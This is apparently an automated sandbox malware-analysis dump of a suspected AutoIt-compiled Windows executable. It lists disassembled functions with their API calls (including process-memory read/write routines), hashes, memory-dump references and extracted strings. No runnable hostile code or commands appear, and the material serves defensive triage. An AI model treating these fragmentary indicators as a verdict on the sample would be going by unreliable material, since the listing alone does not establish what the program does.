            • Instruction ID: 5bcfe0148528dc5ccd42a818a6eed7d8a443bfd8a557d3c093b6bbd5bec90de0
            • Opcode Fuzzy Hash: 18071b511a1e30f1435efa5ad99a706f23d11caeafd55c99633f921b0882aff8
            • Instruction Fuzzy Hash: 0A016931C01629DBEF51AFE5D949AEDBB78FF09300F000966E582F2284CB399650CBA1
            APIs
            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01001114
            • GetLastError.KERNEL32(?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001120
            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 0100112F
            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01000B9B,?,?,?), ref: 01001136
            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100114D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
            • String ID:
            • API String ID: 842720411-0
            • Opcode ID: ffd414ef93f13467180e58cbffc2d983a877090f11d758f7cbd188461211c5f7
            • Instruction ID: dff0678ae8d749b4c6d56511b122777b89d1dc41d6d652bc6a65c5fd81cb63cf
            • Opcode Fuzzy Hash: ffd414ef93f13467180e58cbffc2d983a877090f11d758f7cbd188461211c5f7
            • Instruction Fuzzy Hash: ED016D75100605BFEB264F68DD49AAA3FAEEF85360B100455F981D3340DA36DC009B60
            APIs
            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01000FCA
            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01000FD6
            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01000FE5
            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01000FEC
            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 01001002
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HeapInformationToken$AllocErrorLastProcess
            • String ID:
            • API String ID: 44706859-0
            • Opcode ID: a02c6481b5cc6c7d43982dbf3e0d1cd950d44ee586bd8de04d8e00aa966df389
            • Instruction ID: 6467fbb18472e02d3f4aadae07d1699abb7027454f0d0f7a4955e9466de0fb82
            • Opcode Fuzzy Hash: a02c6481b5cc6c7d43982dbf3e0d1cd950d44ee586bd8de04d8e00aa966df389
            • Instruction Fuzzy Hash: A1F06235200341ABF7224FA8DD4DF563FADEF8A761F104455FAC5D7281CA75D8108B60
            APIs
            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0100102A
            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01001036
            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01001045
            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0100104C
            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01001062
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: HeapInformationToken$AllocErrorLastProcess
            • String ID:
            • API String ID: 44706859-0
            • Opcode ID: 178926f92c251d9f58d7116d5523e4adc22d0e5836bc61b1cfbbf5766d6283a2
            • Instruction ID: 8a6c74cbedd781c534720c9de0da801b3a80645c5eeb0d7ef3206330d516f7b9
            • Opcode Fuzzy Hash: 178926f92c251d9f58d7116d5523e4adc22d0e5836bc61b1cfbbf5766d6283a2
            • Instruction Fuzzy Hash: 1EF06235200341ABF7225FA8ED49F563FADEF8A761F100415FAC5E7280CA75D9208B60
            APIs
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 01010324
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 01010331
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 0101033E
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 0101034B
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 01010358
            • CloseHandle.KERNEL32(?,?,?,?,0101017D,?,010132FC,?,00000001,00FE2592,?), ref: 01010365
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseHandle
            • String ID:
            • API String ID: 2962429428-0
            • Opcode ID: 0fb0e9d67a976a33192867f201eaefef8615f9685087bf6c584d6f85fe0c49cc
            • Instruction ID: 5f8bea76bf93db8063e8aeb132bd2ac4ce1d74ea8279bce112532019a3c604a6
            • Opcode Fuzzy Hash: 0fb0e9d67a976a33192867f201eaefef8615f9685087bf6c584d6f85fe0c49cc
            • Instruction Fuzzy Hash: 4E019E72800B159FD730AF6AD880413FBF9BF502153158A7EE2D652925C375A995DE80
            APIs
            • _free.LIBCMT ref: 00FDD752
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FDD764
            • _free.LIBCMT ref: 00FDD776
            • _free.LIBCMT ref: 00FDD788
            • _free.LIBCMT ref: 00FDD79A
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: b08f2190d91a372dad397d68e4bfb54986a6eb0db9d624cd98f8674d8851f834
            • Instruction ID: db9a9d23c3c46ef513e0bc4941ecff91793af7231f5618440652b17070e8d667
            • Opcode Fuzzy Hash: b08f2190d91a372dad397d68e4bfb54986a6eb0db9d624cd98f8674d8851f834
            • Instruction Fuzzy Hash: 74F044329402046B8775EA58FAC5C1A77EFBB4432079C084BF098D7605C729FC4077A1
            APIs
            • GetDlgItem.USER32(?,000003E9), ref: 01005C58
            • GetWindowTextW.USER32(00000000,?,00000100), ref: 01005C6F
            • MessageBeep.USER32(00000000), ref: 01005C87
            • KillTimer.USER32(?,0000040A), ref: 01005CA3
            • EndDialog.USER32(?,00000001), ref: 01005CBD
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: BeepDialogItemKillMessageTextTimerWindow
            • String ID:
            • API String ID: 3741023627-0
            • Opcode ID: e5b3c2238cb00d69326bc30849f3eb4c04f676b812ce82f5a228bea54385f039
            • Instruction ID: ba8a48062380d04687f3bbfdd71eb1830a97ab7ad7eb11d202395b9f6b0f2a9d
            • Opcode Fuzzy Hash: e5b3c2238cb00d69326bc30849f3eb4c04f676b812ce82f5a228bea54385f039
            • Instruction Fuzzy Hash: B4014F31500708AFFB325B14DE4EFA67BACBB04B05F04165AA6C2A10D1DBB9A9849F90
            APIs
            • _free.LIBCMT ref: 00FD22BE
              • Part of subcall function 00FD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000), ref: 00FD29DE
              • Part of subcall function 00FD29C8: GetLastError.KERNEL32(00000000,?,00FDD7D1,00000000,00000000,00000000,00000000,?,00FDD7F8,00000000,00000007,00000000,?,00FDDBF5,00000000,00000000), ref: 00FD29F0
            • _free.LIBCMT ref: 00FD22D0
            • _free.LIBCMT ref: 00FD22E3
            • _free.LIBCMT ref: 00FD22F4
            • _free.LIBCMT ref: 00FD2305
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$ErrorFreeHeapLast
            • String ID:
            • API String ID: 776569668-0
            • Opcode ID: a84bf2c2b0e493eaa677db09a4846cde3d330fe52048f2a1fc82266a75cfbfd3
            • Instruction ID: 1a9470c10f228ab1ed4621cac699cf567f32ab354d45ae60308769c3d320a426
            • Opcode Fuzzy Hash: a84bf2c2b0e493eaa677db09a4846cde3d330fe52048f2a1fc82266a75cfbfd3
            • Instruction Fuzzy Hash: EFF030B0C001108B9672AF68F81180C3B76B7297617080607F4D0E23ADCB3E0812BBE5
            APIs
            • EndPath.GDI32(?), ref: 00FB95D4
            • StrokeAndFillPath.GDI32(?,?,00FF71F7,00000000,?,?,?), ref: 00FB95F0
            • SelectObject.GDI32(?,00000000), ref: 00FB9603
            • DeleteObject.GDI32 ref: 00FB9616
            • StrokePath.GDI32(?), ref: 00FB9631
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Path$ObjectStroke$DeleteFillSelect
            • String ID:
            • API String ID: 2625713937-0
            • Opcode ID: 01ccc0ac56b964bc401c874f6f00b0c5c890b473bd8453d102e4447999e2fba6
            • Instruction ID: 3253fc940e68b7480aac58e6e56a4252c30e5aa8bda9403a65eb8934ac3c1db7
            • Opcode Fuzzy Hash: 01ccc0ac56b964bc401c874f6f00b0c5c890b473bd8453d102e4447999e2fba6
            • Instruction Fuzzy Hash: 64F0F431809244DBD7365F56E90C7A47F65B701332F048215F595B50F8C77A4556EF20
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: __freea$_free
            • String ID: a/p$am/pm
            • API String ID: 3432400110-3206640213
            • Opcode ID: 5c853d6cc26975a5e29858720b07a21f02edf5e42eb579a7932528e287fcb313
            • Instruction ID: 7843cc06af4bd3b148ef7b022b53a53b0e7286c6674b014c5a0123e9b4610b0d
            • Opcode Fuzzy Hash: 5c853d6cc26975a5e29858720b07a21f02edf5e42eb579a7932528e287fcb313
            • Instruction Fuzzy Hash: FAD1E032D00206EADB289F68C845BBAB7B7FF05320F2C021BE9059B751D3759D80EB91
            APIs
              • Part of subcall function 00FC0242: EnterCriticalSection.KERNEL32(0107070C,01071884,?,?,00FB198B,01072518,?,?,?,00FA12F9,00000000), ref: 00FC024D
              • Part of subcall function 00FC0242: LeaveCriticalSection.KERNEL32(0107070C,?,00FB198B,01072518,?,?,?,00FA12F9,00000000), ref: 00FC028A
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 00FC00A3: __onexit.LIBCMT ref: 00FC00A9
            • __Init_thread_footer.LIBCMT ref: 01027BFB
              • Part of subcall function 00FC01F8: EnterCriticalSection.KERNEL32(0107070C,?,?,00FB8747,01072514), ref: 00FC0202
              • Part of subcall function 00FC01F8: LeaveCriticalSection.KERNEL32(0107070C,?,00FB8747,01072514), ref: 00FC0235
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
            • String ID: 5$G$Variable must be of type 'Object'.
            • API String ID: 535116098-3733170431
            • Opcode ID: 733253a444f5d0981b8a0cce1bb23cc3a314c007911606b97c38cfbba4fdb8b7
            • Instruction ID: a0949f64c9075730f1e7a213f73dd3b1f81710ed61b1897ee58c190b798837c7
            • Opcode Fuzzy Hash: 733253a444f5d0981b8a0cce1bb23cc3a314c007911606b97c38cfbba4fdb8b7
            • Instruction Fuzzy Hash: EB91AB71A00219EFDB15EF58C890DADBBB5FF59300F10809DF886AB292DB71AE41CB51
            APIs
              • Part of subcall function 0100B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010021D0,?,?,00000034,00000800,?,00000034), ref: 0100B42D
            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 01002760
              • Part of subcall function 0100B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,010021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0100B3F8
              • Part of subcall function 0100B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0100B355
              • Part of subcall function 0100B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,01002194,00000034,?,?,00001004,00000000,00000000), ref: 0100B365
              • Part of subcall function 0100B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,01002194,00000034,?,?,00001004,00000000,00000000), ref: 0100B37B
            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 010027CD
            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0100281A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
            • String ID: @
            • API String ID: 4150878124-2766056989
            • Opcode ID: 625e52b7f09604e5ab3ba5b1576285b11fd204458007344ea37e656e9c27d493
            • Instruction ID: a9ee0aa1f0259f27722cc2aca4c51384c22f8f9ce91988804ac4f179ca857854
            • Opcode Fuzzy Hash: 625e52b7f09604e5ab3ba5b1576285b11fd204458007344ea37e656e9c27d493
            • Instruction Fuzzy Hash: 88415C76900218AFEB11DFA4CD45AEEBBB8EF19300F108095EA85B7180DB706F45CBA0
            APIs
            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\8t1uarSZFV.exe,00000104), ref: 00FD1769
            • _free.LIBCMT ref: 00FD1834
            • _free.LIBCMT ref: 00FD183E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _free$FileModuleName
            • String ID: C:\Users\user\Desktop\8t1uarSZFV.exe
            • API String ID: 2506810119-4183201048
            • Opcode ID: b27dc62a0a54d999a660af7ae05349ff48da25028fdec7a6db330e997d2efa41
            • Instruction ID: 9fe92195e08f2a3daf49053be7d6e7f41a0d7db8b96bb21af26175a4f12a6d33
            • Opcode Fuzzy Hash: b27dc62a0a54d999a660af7ae05349ff48da25028fdec7a6db330e997d2efa41
            • Instruction Fuzzy Hash: C8318D71E00218BBDB21DB99D885D9EBBBEFB85320B184167F804E7311D6758A41EBA0
            APIs
            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0100C306
            • DeleteMenu.USER32(?,00000007,00000000), ref: 0100C34C
            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01071990,011E6BB0), ref: 0100C395
            Strings
            Similarity
            • API ID: Menu$Delete$InfoItem
            • String ID: 0
            • API String ID: 135850232-4108050209
            • Opcode ID: 0869e83d5b16211a7138f291fa179ffa3a77cf212edc45b26e43cf6db9461bb4
            • Instruction ID: 70db6e8a86213ebb0c0e4072f0997c0c56d99e869b2aeed37eb9898f340347cf
            • Opcode Fuzzy Hash: 0869e83d5b16211a7138f291fa179ffa3a77cf212edc45b26e43cf6db9461bb4
            • Instruction Fuzzy Hash: 0C41A2712043029FF721DF28D984B5ABBE8AF85310F00879EF9E5972D1D774A604CB62
            APIs
            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0103CC08,00000000,?,?,?,?), ref: 010344AA
            • GetWindowLongW.USER32 ref: 010344C7
            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 010344D7
            Strings
            Similarity
            • API ID: Window$Long
            • String ID: SysTreeView32
            • API String ID: 847901565-1698111956
            • Opcode ID: d294de2be430d0970432461990a31037bcbe1e081929a4064d5841b1b46bcb52
            • Instruction ID: d95b635504537846ccccd8eddac81fc7d75a5be096cf520342b995a4a60366af
            • Opcode Fuzzy Hash: d294de2be430d0970432461990a31037bcbe1e081929a4064d5841b1b46bcb52
            • Instruction Fuzzy Hash: D331DE32200205AFEB618E38DC45BEA7BADEB89334F204725F9B5E61D1DB74E8509B50
            APIs
              • Part of subcall function 0102335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,01023077,?,?), ref: 01023378
            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0102307A
            • _wcslen.LIBCMT ref: 0102309B
            • htons.WSOCK32(00000000,?,?,00000000), ref: 01023106
            Strings
            Similarity
            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
            • String ID: 255.255.255.255
            • API String ID: 946324512-2422070025
            • Opcode ID: cecf4d1e4e73c70a7b70bcd5c79d04426b9f3bcab62272a647b202c2183b1180
            • Instruction ID: 7415798ae83e1a58ac3213b4230287de18dddbd34bc5e1e84c9402d3f8488a8e
            • Opcode Fuzzy Hash: cecf4d1e4e73c70a7b70bcd5c79d04426b9f3bcab62272a647b202c2183b1180
            • Instruction Fuzzy Hash: 1E31C1352042219FD720CF68C595EAA7BF0FF18318F248499E9958F392CB7AEA41C760
            APIs
            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 01034705
            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 01034713
            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0103471A
            Strings
            Similarity
            • API ID: MessageSend$DestroyWindow
            • String ID: msctls_updown32
            • API String ID: 4014797782-2298589950
            • Opcode ID: c61a08c860f9c7870a428c166f2b9fa3a6ed745d32a99e41e0a6fc808fb44b98
            • Instruction ID: 896a234df2a97583cff37f8e65ca031502b3a3392cf243ece8b7264bf4c3bd1d
            • Opcode Fuzzy Hash: c61a08c860f9c7870a428c166f2b9fa3a6ed745d32a99e41e0a6fc808fb44b98
            • Instruction Fuzzy Hash: 302160B5600209AFEB11DF68DCC1DA737EDEB8A394B040459FA40DB291C775EC11DB60
            APIs
            Strings
            Similarity
            • API ID: _wcslen
            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
            • API String ID: 176396367-2734436370
            • Opcode ID: 73dfe255641543bedde7653c4009d1c80f676fb578470e6cc9452e5d8f5d852f
            • Instruction ID: eb52461fb89baccb8fc81c9f55b00c43835ca6d1913a4cc5ed01b74e00a3f059
            • Opcode Fuzzy Hash: 73dfe255641543bedde7653c4009d1c80f676fb578470e6cc9452e5d8f5d852f
            • Instruction Fuzzy Hash: A6213B7210461166F332BA299C02FBB77DC9F95304F004029F9CD97183EB559941D395
            APIs
            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 01033840
            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 01033850
            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 01033876
            Strings
            Similarity
            • API ID: MessageSend$MoveWindow
            • String ID: Listbox
            • API String ID: 3315199576-2633736733
            • Opcode ID: 9046c4b323501fc59e3fa40af42b63726de08b25dad3b32a577fc6b747a8932d
            • Instruction ID: 554c7124fb10bd378e8fc7a2f32fbb69c30361d7abde331b7a827a064f850937
            • Opcode Fuzzy Hash: 9046c4b323501fc59e3fa40af42b63726de08b25dad3b32a577fc6b747a8932d
            • Instruction Fuzzy Hash: 6B21B072610218BBEB228F58CC85EAB37AEFFC9750F108154F9809B190C676DC5287A0
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 01014A08
            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 01014A5C
            • SetErrorMode.KERNEL32(00000000,?,?,0103CC08), ref: 01014AD0
            Strings
            Similarity
            • API ID: ErrorMode$InformationVolume
            • String ID: %lu
            • API String ID: 2507767853-685833217
            • Opcode ID: c5099aad1a06ef906499a7fbd10dfd3d10345b0b780beaf8def189c9a404f1d5
            • Instruction ID: d50830b823c0c92269e835bb65a68851a9829d5f427a57601571c3145ecc4a88
            • Opcode Fuzzy Hash: c5099aad1a06ef906499a7fbd10dfd3d10345b0b780beaf8def189c9a404f1d5
            • Instruction Fuzzy Hash: 71319171A00109AFDB10DF54C980EAE7BF8EF09308F1480A9F949EB252D775EE45DB61
            APIs
            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0103424F
            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 01034264
            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 01034271
            Strings
            Similarity
            • API ID: MessageSend
            • String ID: msctls_trackbar32
            • API String ID: 3850602802-1010561917
            • Opcode ID: 5fe984e0b5f4c80d579dd9bfa144694740266a7e4364298d4becf9a4d6a20b3f
            • Instruction ID: 2b12449aec5c9286f062c933ced312ac377c951f3c30950221275d88edca50ec
            • Opcode Fuzzy Hash: 5fe984e0b5f4c80d579dd9bfa144694740266a7e4364298d4becf9a4d6a20b3f
            • Instruction Fuzzy Hash: 9F11C671240248BFEF215E69CC06FAB3BACEFC5B54F014515FA95F6090D271D8519B10
            APIs
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
              • Part of subcall function 01002DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01002DC5
              • Part of subcall function 01002DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 01002DD6
              • Part of subcall function 01002DA7: GetCurrentThreadId.KERNEL32 ref: 01002DDD
              • Part of subcall function 01002DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01002DE4
            • GetFocus.USER32 ref: 01002F78
              • Part of subcall function 01002DEE: GetParent.USER32(00000000), ref: 01002DF9
            • GetClassNameW.USER32(?,?,00000100), ref: 01002FC3
            • EnumChildWindows.USER32(?,0100303B), ref: 01002FEB
            Strings
            Similarity
